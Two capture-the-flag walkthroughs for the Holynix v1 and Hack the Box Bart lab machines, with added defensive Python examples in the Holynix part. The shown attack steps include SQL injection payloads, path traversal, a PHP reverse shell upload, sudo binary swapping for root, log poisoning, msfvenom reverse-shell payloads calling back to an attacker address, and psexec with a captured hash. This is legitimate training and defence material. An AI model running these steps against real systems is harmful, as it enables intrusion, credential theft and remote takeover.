Hack the Holynix: v1 (Boot 2 Root Challenge)


Hello friends! Today we are going to take on another CTF challenge, Holynix 1. It is another boot2root challenge provided for practice, and its difficulty level is aimed at beginners. So let’s try to break through it. Before we start, note that you can download it from here: https://www.vulnhub.com/entry/holynix-v1,20/
Penetrating Methodologies
  • Network Scanning (Nmap, netdiscover)
  • Surfing HTTP service port (80)
  • Exploit LFI/RFI Vulnerability
  • SQLMAP Scanning
  • Extract databases and user credentials
  • Login into the website with a specific user
  • Upload and execute a Reverse shell
  • Reverse connection (Netcat)
  • Exploiting target with SUDO binaries
  • Get the Root access
WalkThrough
Let’s start off with scanning the network to find our target.




We found our target -> 192.168.1.105
Our next step is to scan the target with Nmap:
nmap -p- -A 192.168.1.105




The result shows that only port 80 (HTTP) is open.
When we tried to log in to the site with a random username and password (e.g. admin/admin), it returned an error. On further enumeration we found that the error message indicates the login form is subject to SQL injection.




This appears to be a basic SQL query. We should now be able to bypass the login using the or 1=1 technique:
Username = ' or 1=1 #
Password = ' or 1=1 #
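Why the bypass works, and how the login should have been written, as an added example that is not part of the original walkthrough: the vulnerable function below splices the submitted username and password into the SQL text, which is exactly what the payload above exploits, while the parameterised version hands the same strings to the driver as values. The user table and credentials are constructed for the demo; it runs on SQLite, whose line-comment marker is -- rather than the # that MySQL accepts, so the payload is written with -- here.

```python
import sqlite3


def make_db():
    """Constructed in-memory user table for the demo (not the Holynix database)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alamo', 'constructed-secret')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Login check that splices user input into the SQL text (the flaw)."""
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Same check with bound parameters: quotes and comment markers stay data."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both checks against the page's payload and against real credentials."""
    conn = make_db()
    # SQLite ends a line comment with '--'; MySQL also accepts '#', as used on the page.
    payload = "' or 1=1 -- "
    return {
        "vulnerable_with_payload": login_vulnerable(conn, payload, payload),
        "safe_with_payload": login_safe(conn, payload, payload),
        "safe_with_real_credentials": login_safe(conn, "alamo", "constructed-secret"),
        "safe_with_wrong_password": login_safe(conn, "alamo", "nope"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```

With the payload in both fields, the vulnerable query becomes WHERE username='' or 1=1 followed by a comment, so the first user row is returned; the parameterised query compares the literal string and finds nothing. A real login would also compare a password hash rather than stored plaintext; the point here is only where the query text comes from.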




Once logged in, we noticed that we were actually inside the user Alamo’s page. After looking at the different pages, we navigated to the Upload page and tried to upload the php-reverse-shell.php file.




Upon trying to upload php-reverse-shell.php, we got the notification shown below. It seems that Alamo, being a restricted user, doesn’t have permission to upload files.




We ran nikto to find out more about the site and observed that there could be an LFI/RFI vulnerability:
nikto -h http://192.168.1.105




We need to see what information is passed from the user to the web server. Let’s start Burp Suite, try uploading a file again, and observe what actually happens.
First open the URL, select Email from the dropdown and click on Display File.




The parameter passed in the POST request is text_file_name=ssp%2Femail.txt&B=Display+File, as seen in the Burp Suite screenshot below.




Since we know there is an LFI/RFI vulnerability on this website, let’s modify the parameter in the intercepted POST request as follows: text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File




Once we change the request body (as shown above) in Burp Suite and click Forward, the page displays the entire contents of /etc/passwd.
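One way the Display File feature could have refused the traversal above, as an added example that is not the application’s own code: resolve the requested name under a fixed directory and reject anything that ends up outside it or is not a text file. The base directory /holynix-demo/textfiles and the .txt-only policy are assumptions for the demo; the request bodies it is run against are the two shown in the walkthrough plus an absolute-path variant.

```python
import os
from urllib.parse import parse_qs

# Assumed directory the "Display File" feature is meant to serve from (demo value).
BASE_DIR = "/holynix-demo/textfiles"


def resolve_under(base_dir, requested):
    """Return the absolute path for `requested` if it stays inside base_dir, else None.

    realpath() collapses '..' segments and follows symlinks, so the decision is
    made on where the path actually ends up, not on what the string looks like.
    An absolute `requested` makes os.path.join discard base_dir entirely, which
    the prefix check below catches as well.
    """
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested))
    # Compare with a trailing separator so /x/files-evil is not accepted as under /x/files.
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None


def check_display_request(body):
    """Decide whether a POST body like the walkthrough's should be served.

    Returns ("allow", absolute_path) or ("deny", requested_name).
    Policy: the file must resolve under BASE_DIR and carry a .txt extension.
    """
    params = parse_qs(body)                       # decodes %2F to '/' and '+' to ' '
    requested = params.get("text_file_name", [""])[0]
    path = resolve_under(BASE_DIR, requested)
    if path is None or not path.lower().endswith(".txt"):
        return ("deny", requested)
    return ("allow", path)


if __name__ == "__main__":
    for body in (
        "text_file_name=ssp%2Femail.txt&B=Display+File",
        "text_file_name=ssp%2F../../../../../../../../../../etc/passwd&B=Display+File",
        "text_file_name=%2Fetc%2Fpasswd&B=Display+File",
    ):
        print(check_display_request(body))
```

The legitimate request resolves to a .txt file inside the base directory and is served; the traversal resolves to /etc/passwd, which fails the prefix check regardless of how many ../ segments were supplied.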




Now that we have the full list of users, let’s pick one at random and run SQLMAP with the following command to find out more.
To begin with, we take the user etenenbaum as an example:
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" --dbs --batch




We got the list of all databases!! Next we target the creds database with the following command to extract the other users’ details:
sqlmap -u http://192.168.1.105/index.php?page=login.php --forms --data="username=etenenbaum" -D creds --tables --dump --batch




We were able to log in to the website as etenenbaum with the corresponding password (as displayed above). The next step is to set up a netcat listener on the Kali machine. The shell script uploaded successfully; however, when we executed the file there was no connection on the netcat listener and the browser returned an error.
Here we got a clue from the website’s upload page: there is an option “Enable the automatic extraction of gzip archives”. This led us to try uploading the file again, this time as a gzip-compressed tar archive.
Below is the command to tar and gzip the reverse shell file shell.php:
tar -zcvf shell.tar.gz shell.php




Click on Browse and select shell.tar.gz from the Kali desktop. Tick the option “Enable the automatic extraction of gzip archives” and then upload the file.
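Automatic extraction is what turned a successful upload into code execution here: the extracted shell.php landed in a web-served home directory. As an added example that is not part of the original page, the following inspects an archive’s member table before anything is written and rejects members with non-allowlisted extensions, link members, special files and names that escape the target directory. The extension allowlist and the in-memory test archives are constructed for the demo.

```python
import io
import posixpath
import tarfile

# Demo allowlist for an uploader that serves files out of a home directory.
ALLOWED_EXTENSIONS = {".txt", ".jpg", ".png", ".pdf"}


def unsafe_members(archive_bytes):
    """List (member_name, reason) pairs an auto-extractor should refuse.

    Only the member table is examined; nothing is written to disk.
    """
    problems = []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tf:
        for member in tf.getmembers():
            name = member.name
            if name.startswith("/") or ".." in name.split("/"):
                problems.append((name, "path escapes upload directory"))
            elif member.issym() or member.islnk():
                problems.append((name, "link member"))
            elif not (member.isfile() or member.isdir()):
                problems.append((name, "special file"))
            elif member.isfile() and posixpath.splitext(name)[1].lower() not in ALLOWED_EXTENSIONS:
                problems.append((name, "disallowed extension"))
    return problems


def safe_to_extract(archive_bytes):
    """True when every member passes the checks above."""
    return not unsafe_members(archive_bytes)


def build_archive(files):
    """Constructed in-memory .tar.gz for the demo (not the walkthrough's shell.tar.gz)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        for name, content in files:
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


if __name__ == "__main__":
    clean = build_archive([("notes.txt", b"hello")])
    risky = build_archive([
        ("notes.txt", b"hello"),
        ("shell.php", b"placeholder content, not a script"),
        ("../../escape.txt", b"x"),
    ])
    print(safe_to_extract(clean), unsafe_members(risky))
```

Python 3.12’s tarfile.data_filter performs the traversal and link checks at extraction time; the extension policy is the application’s own decision, and for a web-served directory it is the check that matters most.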




We now need to locate the path of the file we just uploaded, as the actual objective is to upload a PHP reverse shell script and then execute it. We looked in many places but could not find our recently uploaded file. We also checked the ‘Upload’ directory (http://192.168.1.105/upload) without success.
Then it struck us: the upload page says “Home directory uploader”, so it may be uploading files to the users’ home directories.
We appended the subdirectory /~etenenbaum/ and browsed to http://192.168.1.105/~etenenbaum/, and now we could see our uploaded file!!




We started the netcat listener on the Kali machine. Upon executing shell.php (by opening it in the browser, as shown), we got limited shell access.
nc -lvp 1234




Now let’s perform further enumeration and try to escalate privileges.
Upon running the sudo command, we can see that there are multiple commands that allow the user www-data to sudo as root.
sudo -l
Navigate to the /tmp directory:
cd /tmp/

Copy the /bin/bash file to the /tmp folder:
cp /bin/bash .

Change the ownership of the file /tmp/bash so that root is its owner:
sudo chown root:root /tmp/bash

Back up the existing /bin/tar file to /bin/tar.bak:
sudo mv /bin/tar /bin/tar.bak

Now move the /tmp/bash file to /bin/tar:
sudo mv /tmp/bash /bin/tar

Execute the command /bin/tar (which is now actually /bin/bash):
sudo /bin/tar

Finally run the id command to confirm the same:
id

Hurray!! We got root access!
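The escalation above works because sudo lets www-data run mv, chown and cp as root without a password; any one of those is enough to replace a root-owned binary such as /bin/tar. As an added example that is not part of the original walkthrough, this Python audit parses a constructed set of sudoers-style rules and flags rules that hand file-writing binaries, or ALL, to non-root users running as root. The rule text, the binary list and the service-account list are assumptions for the demo, not the Holynix machine’s real configuration.

```python
import re

# Constructed sudoers-style rules for the demo (not the Holynix machine's real
# sudo -l output).  Shape: user host=(runas) [NOPASSWD:] cmd[, cmd...]
SAMPLE_RULES = """\
root      ALL=(ALL) ALL
www-data  ALL=(ALL) NOPASSWD: /bin/mv, /bin/chown, /bin/cp, /bin/tar
backup    ALL=(root) /usr/bin/rsync
deploy    ALL=(ALL) NOPASSWD: ALL
"""

# Demo list: binaries that can replace or re-own arbitrary files when run as root,
# which is all it takes to swap a root-owned program for a shell.
FILE_WRITE_CAPABLE = {"mv", "cp", "chown", "chmod", "tar", "dd", "tee", "install"}
# Demo list: accounts reachable through a web application compromise.
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody"}

RULE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)=\((?P<runas>[^)]*)\)\s*"
    r"(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$"
)


def audit_sudoers(text):
    """Return (user, finding) pairs for rules that effectively grant root."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = RULE.match(line)
        if m is None:
            findings.append((line, "unparsed rule, review manually"))
            continue
        user = m.group("user")
        runas_user = m.group("runas").split(":")[0].strip()   # "(ALL:ALL)" -> "ALL"
        if user == "root" or runas_user not in ("ALL", "root"):
            continue        # root's own rules and non-root runas targets are out of scope
        nopasswd = "NOPASSWD" in m.group("tags").upper()
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        if "ALL" in cmds:
            findings.append((user, "unrestricted root command set"
                             + (" without password" if nopasswd else "")))
            continue
        risky = sorted({c.rsplit("/", 1)[-1] for c in cmds} & FILE_WRITE_CAPABLE)
        if risky:
            severity = "high" if (nopasswd or user in SERVICE_ACCOUNTS) else "medium"
            findings.append((user, f"{severity}: root file write via {', '.join(risky)}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit_sudoers(SAMPLE_RULES):
        print(f"{user}: {finding}")
```

The fix on the defending side is the obvious one: a web service account should not appear in sudoers at all, and any rule that must exist should name a specific, non-file-writing command and a non-root runas user.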



Hack the Box: Bart Walkthrough


Hello friends!! Today we are going to solve another CTF challenge, “Bart”, which is available online for those who want to increase their skills in penetration testing and black box testing. Bart is a retired vulnerable lab presented by Hack the Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to Expert level.
Level: Expert
Task: find the user.txt and root.txt files on the victim’s machine.
Since these labs are available online, they have static IPs. The IP of this lab is 10.10.10.81, so let’s begin with nmap port enumeration.
nmap -sV -p- 10.10.10.81
From the image below, you can observe that only port 80 is open on the target system.




As port 80 is running http, we open the IP address in our browser. As soon as we open the IP address we get redirected to “forum.bart.htb”.




Since htb doesn’t have global DNS, we can’t resolve the site. So we add an entry in our /etc/hosts file to point 10.10.10.81 to both bart.htb and forum.bart.htb.



When we open forum.bart.htb, we find a website built on WordPress.



When we open bart.htb, it redirects us to forum.bart.htb. We enumerate directories for both domains and find a directory called “/monitor” on bart.htb.
dirb http://bart.htb/




Opening the /monitor directory found by the dirb scan, we find a login page.



We use Burp Suite to brute force the login page using the /usr/share/wordlists/metasploit/common-root.txt dictionary and find the credentials to be harvery:potter.




We login using these credentials and get redirected to a different domain called monitor.bart.htb




We add the domain name monitor.bart.htb in /etc/hosts file.




Now when we refresh the page we get a page for server monitoring.



Going through the page, we find a link to a site on a domain that we need to add to /etc/hosts.




We add internal-01.bart.htb we found earlier on the site to /etc/hosts.




We now open internal-01.bart.htb and find a login form.




We capture the login request using burpsuite and modify the request by changing login.php to register.php.




Then we log in using the credentials we used to register and find a chat box.



We find a link to an open log; it looks like it may be vulnerable to LFI.




We were not able to access any system file, but we were able to access log.php and view the access logs.




Now we use log poisoning to get a reverse shell. We change the User-Agent to run the whoami command; when we run the command, we get the user name.
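Log poisoning leaves a trace in the very file it abuses: the injected PHP arrives in the User-Agent (or Referer) field of an ordinary request and is recorded verbatim. As an added example that is not part of the original page, the following parser reads combined-format access log lines and flags entries whose header values contain PHP open tags or execution function names, which is the kind of check a defender would run over web logs once an LFI is suspected. The three log lines are constructed for the demo and are not from the Bart machine.

```python
import re

# Constructed combined-format access log lines for the demo (not from the Bart machine).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /log.php HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /log.php HTTP/1.1" 200 640 "-" "<?php echo 'constructed-marker'; ?>"
10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 300 "-" "curl/7.88.1"
"""

# Combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP open tags and the execution functions a poisoned header would carry.
SUSPICIOUS = re.compile(
    r"<\?php|<\?=|\b(?:system|shell_exec|passthru|exec|eval|assert)\s*\(|base64_decode",
    re.IGNORECASE,
)


def find_poisoned(log_text):
    """Return a record for each line whose User-Agent or Referer looks like injected PHP."""
    hits = []
    for line in log_text.splitlines():
        m = COMBINED.match(line)
        if m is None:
            continue    # different format or truncated line; a real pipeline would count these
        for field in ("ua", "ref"):
            if SUSPICIOUS.search(m.group(field)):
                hits.append({
                    "ip": m.group("ip"),
                    "time": m.group("ts"),
                    "request": m.group("req"),
                    "field": field,
                    "value": m.group(field),
                })
                break
    return hits


if __name__ == "__main__":
    for hit in find_poisoned(SAMPLE_LOG):
        print(hit)
```

Detection is the second line; the first is never passing a user-selected path to include(), since a log file that is only ever read as text cannot execute anything regardless of what the headers contain.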


We were not able to get a shell through the command injection directly, so we first create a reverse shell executable using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.6 lport=4444 -f exe > shell.exe


After creating our shell, we upload the payload to the target machine using PowerShell. First we set up an HTTP server using Python:
python -m SimpleHTTPServer 80


We set up our listener using Metasploit before executing the payload on the target machine.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run


We now execute the payload using log poisoning.


As soon as we execute the payload we get our reverse shell.


After we get the reverse shell, we find that the system has a 64-bit architecture, so we switch to a 64-bit payload.

msf > use windows/local/payload_inject
msf exploit(windows/local/payload_inject) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(windows/local/payload_inject) > set lhost 10.10.14.6
msf exploit(windows/local/payload_inject) > set lport 1234
msf exploit(windows/local/payload_inject) > set session 1
msf exploit(windows/local/payload_inject) > run


After running the exploit, we get a 64-bit meterpreter shell. Now we can run post modules properly, as the 32-bit meterpreter was running into problems.


We use the autologin post module to find the password for the Administrator user.

msf > use windows/gather/credentials/windows_autologin
msf post(windows/gather/credentials/windows_autologin) > set session 2
msf post(windows/gather/credentials/windows_autologin) > run


Now, enumerating the target machine, we find that port 445 is listening internally. So we use port forwarding so that we can connect to it from our machine.
meterpreter > portfwd add -l 443 -p 445 -r 10.10.10.81


Now we use impacket-smbserver to create an SMB server on our machine so that we can share our payload with the target machine.

impacket-smbserver hack /root


Now the session we had earlier has died, so port 4444 is free. We are going to reuse that payload to get our reverse shell. First we run Metasploit in a new tab and set up our listener.
msf > use multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.6
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > run


msf > use auxiliary/admin/smb/psexec_command
msf auxiliary(admin/smb/psexec_command) > set SMBUser Administrator
msf auxiliary(admin/smb/psexec_command) > set SMBPass 3130438f31186fbaf962f407711faddb
msf auxiliary(admin/smb/psexec_command) > set COMMAND \\\\10.10.14.6\\\hack\\\shell.exe
msf auxiliary(admin/smb/psexec_command) > set rhosts 127.0.0.1
msf auxiliary(admin/smb/psexec_command) > set rport 443
msf auxiliary(admin/smb/psexec_command) > run


As soon as we run the psexec auxiliary module, we get a reverse shell as Administrator.


In c:\Users\Administrator\Desktop we find a file called root.txt; when we open it, we find our first flag.


Enumerating the system, in c:\Users\h.potter we find a file called user.txt. When we look at its contents, we get our second flag.